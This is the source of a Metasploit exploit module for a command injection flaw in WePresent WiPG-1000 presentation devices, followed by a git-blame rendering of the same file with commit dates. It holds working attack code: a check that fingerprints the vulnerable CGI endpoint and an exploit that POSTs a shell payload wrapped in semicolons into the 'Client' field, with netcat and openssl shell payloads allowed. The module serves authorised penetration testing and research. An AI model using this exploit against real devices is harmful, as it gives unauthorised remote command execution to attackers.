metasploit-framework/modules/exploits/linux/http/wipg1000_cmd_injection.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'WePresent WiPG-1000 Command Injection',
      'Description'    => %q{
        This module exploits a command injection vulnerability in an undocumented
        CGI file in several versions of the WePresent WiPG-1000 devices.
        Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Matthias Brun', # Vulnerability Discovery, Metasploit Module
        ],
      'References'     =>
        [
          [ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ]
        ],
      'Payload'        =>
        {
          'Compat'     =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic netcat openssl'
            }
        },
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['WiPG-1000 <=2.0.0.7', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 20 2017',
      'DefaultTarget'  => 0))
  end


  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => '/cgi-bin/rdfs.cgi'
    })
    if res && res.body.include?("Follow administrator instructions to enter the complete path")
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status('Sending request')
    send_request_cgi(
      'method' => 'POST',
      'uri'    => '/cgi-bin/rdfs.cgi',
      'vars_post' => {
        'Client' => ";#{payload.encoded};",
        'Download' => 'Download'
      }
    )
  end
end
Add WiPG-1000 Command Injection module 2017-04-20 14:32:23 +00:00			`##`
use https for metaploit.com links 2017-07-24 13:26:21 +00:00			`# This module requires Metasploit: https://metasploit.com/download`
Add WiPG-1000 Command Injection module 2017-04-20 14:32:23 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class MetasploitModule < Msf::Exploit::Remote`
			`Rank = ExcellentRanking`

			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => 'WePresent WiPG-1000 Command Injection',`
			`'Description' => %q{`
added version numbers 2017-04-22 13:45:55 +00:00			`This module exploits a command injection vulnerability in an undocumented`
Add WiPG-1000 Command Injection module 2017-04-20 14:32:23 +00:00			`CGI file in several versions of the WePresent WiPG-1000 devices.`
added version numbers 2017-04-22 13:45:55 +00:00			`Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.`
Add WiPG-1000 Command Injection module 2017-04-20 14:32:23 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Matthias Brun', # Vulnerability Discovery, Metasploit Module`
			`],`
			`'References' =>`
			`[`
			`[ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ]`
			`],`
			`'Payload' =>`
			`{`
			`'Compat' =>`
			`{`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'generic netcat openssl'`
			`}`
			`},`
			`'Platform' => ['unix'],`
			`'Arch' => ARCH_CMD,`
			`'Targets' =>`
			`[`
			`['WiPG-1000 <=2.0.0.7', {}]`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => 'Apr 20 2017',`
			`'DefaultTarget' => 0))`
			`end`


			`def check`
			`res = send_request_cgi({`
			`'method' => 'GET',`
Make minor changes 2017-04-24 21:35:36 +00:00			`'uri' => '/cgi-bin/rdfs.cgi'`
Add WiPG-1000 Command Injection module 2017-04-20 14:32:23 +00:00			`})`
Make minor changes 2017-04-24 21:35:36 +00:00			`if res && res.body.include?("Follow administrator instructions to enter the complete path")`
			`Exploit::CheckCode::Appears`
Add WiPG-1000 Command Injection module 2017-04-20 14:32:23 +00:00			`else`
Make minor changes 2017-04-24 21:35:36 +00:00			`Exploit::CheckCode::Safe`
Add WiPG-1000 Command Injection module 2017-04-20 14:32:23 +00:00			`end`
			`end`

			`def exploit`
			`print_status('Sending request')`
Inline execute_cmd function 2017-04-21 13:32:15 +00:00			`send_request_cgi(`
Add WiPG-1000 Command Injection module 2017-04-20 14:32:23 +00:00			`'method' => 'POST',`
Make minor changes 2017-04-24 21:35:36 +00:00			`'uri' => '/cgi-bin/rdfs.cgi',`
Add WiPG-1000 Command Injection module 2017-04-20 14:32:23 +00:00			`'vars_post' => {`
Inline execute_cmd function 2017-04-21 13:32:15 +00:00			`'Client' => ";#{payload.encoded};",`
Add WiPG-1000 Command Injection module 2017-04-20 14:32:23 +00:00			`'Download' => 'Download'`
			`}`
			`)`
			`end`
			`end`